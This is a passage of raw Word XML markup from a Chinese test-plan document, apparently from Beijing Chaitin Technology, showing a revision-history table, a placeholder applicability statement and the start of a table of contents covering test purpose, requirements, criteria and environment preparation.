                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>09</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3242" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46BCCA01">
            <w:pPr>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:afterLines="0"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>创建</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1943" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="539E5696">
            <w:pPr>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:afterLines="0"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>郑思成</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="68D636C5">
        <w:trPr>
          <w:trHeight w:val="410" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1852" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7AD98546">
            <w:pPr>
              <w:pStyle w:val="80"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>25.11.002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2007" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="05DAC977">
            <w:pPr>
              <w:pStyle w:val="81"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>2025-11-21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3242" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="356F9773">
            <w:pPr>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:afterLines="0"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>修改</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1943" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1511D99E">
            <w:pPr>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:afterLines="0"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>余佳霖</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6FD9EEA6">
      <w:pPr>
        <w:widowControl/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:afterLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16A53731">
      <w:pPr>
        <w:widowControl/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:afterLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B430108">
      <w:pPr>
        <w:widowControl/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:afterLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="348B6C85">
      <w:pPr>
        <w:widowControl/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:afterLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63CEF146">
      <w:pPr>
        <w:widowControl/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:afterLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="150AE4CC">
      <w:pPr>
        <w:widowControl/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:afterLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DF81BD5">
      <w:pPr>
        <w:widowControl/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:afterLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12509D4A">
      <w:pPr>
        <w:widowControl/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:afterLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39AECA5E">
      <w:pPr>
        <w:widowControl/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:afterLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0196519E">
      <w:pPr>
        <w:widowControl/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:afterLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EC5C93A">
      <w:pPr>
        <w:widowControl/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:afterLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04C5A412">
      <w:pPr>
        <w:widowControl/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:afterLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D33F811">
      <w:pPr>
        <w:widowControl/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:afterLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DC0807D">
      <w:pPr>
        <w:widowControl/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:afterLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D0E0CDC">
      <w:pPr>
        <w:widowControl/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:afterLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F101868">
      <w:pPr>
        <w:widowControl/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:afterLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6785285E">
      <w:pPr>
        <w:widowControl/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:afterLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A6A8F23">
      <w:pPr>
        <w:widowControl/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:afterLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65022E9E">
      <w:pPr>
        <w:widowControl/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:afterLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FC35BCF">
      <w:pPr>
        <w:widowControl/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:afterLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24A5EA12">
      <w:pPr>
        <w:widowControl/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:afterLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C116E2A">
      <w:pPr>
        <w:widowControl/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:afterLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13BBE886">
      <w:pPr>
        <w:widowControl/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:afterLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AD4170D">
      <w:pPr>
        <w:widowControl/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:afterLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2585144F">
      <w:pPr>
        <w:widowControl/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:afterLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D68D238">
      <w:pPr>
        <w:widowControl/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:afterLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39559F09">
      <w:pPr>
        <w:widowControl/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:afterLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>适用性说明</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="31"/>
        <w:tblW w:w="905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9"/>
      </w:tblGrid>
      <w:tr w14:paraId="677C556D">
        <w:trPr>
          <w:trHeight w:val="813" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9059" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24C2FD4E">
            <w:pPr>
              <w:widowControl/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:afterLines="0"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>本文档为北京长亭科技有限公司（以下简称“长亭科技”）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>xxx</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27E62A5D">
      <w:pPr>
        <w:widowControl/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:afterLines="0"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="397" w:footer="624" w:gutter="0"/>
          <w:cols w:space="425" w:num="1"/>
          <w:docGrid w:type="linesAndChars" w:linePitch="326" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="auto"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:id w:val="-1"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="43F3FD9D">
          <w:pPr>
            <w:pStyle w:val="74"/>
            <w:ind w:firstLine="420"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
              <w:b/>
              <w:sz w:val="30"/>
              <w:szCs w:val="30"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:t>目录</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1F31C8AA">
          <w:pPr>
            <w:pStyle w:val="18"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9026"/>
              <w:tab w:val="clear" w:pos="567"/>
              <w:tab w:val="clear" w:pos="9214"/>
            </w:tabs>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> HYPERLINK \l _Toc52954766 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t xml:space="preserve">1 </w:t>
          </w:r>
          <w:r>
            <w:t>概述</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc52954766 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>6</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="22DC5BB8">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_Toc952522304 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:eastAsia="Arial" w:cs="Arial"/>
            </w:rPr>
            <w:t xml:space="preserve">1.1 </w:t>
          </w:r>
          <w:r>
            <w:t>测试目的</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc952522304 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>6</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="034BE96B">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_Toc1699258590 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t xml:space="preserve">1.2 </w:t>
          </w:r>
          <w:r>
            <w:t>测试要求</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1699258590 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>6</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="0D3D04C4">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_Toc54100677 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:eastAsia="Arial" w:cs="Arial"/>
            </w:rPr>
            <w:t xml:space="preserve">1.3 </w:t>
          </w:r>
          <w:r>
            <w:t>评判标准</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc54100677 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>6</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="198E62A5">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_Toc884495658 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>1.4 测试说明</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc884495658 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>6</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="5A84F38D">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_Toc836719472 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>2 环境准备</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc836719472 \h </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:t>7</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:color w:val="4C4948"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p w14:paraId="2B615890">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_Toc1021245348 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="黑体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
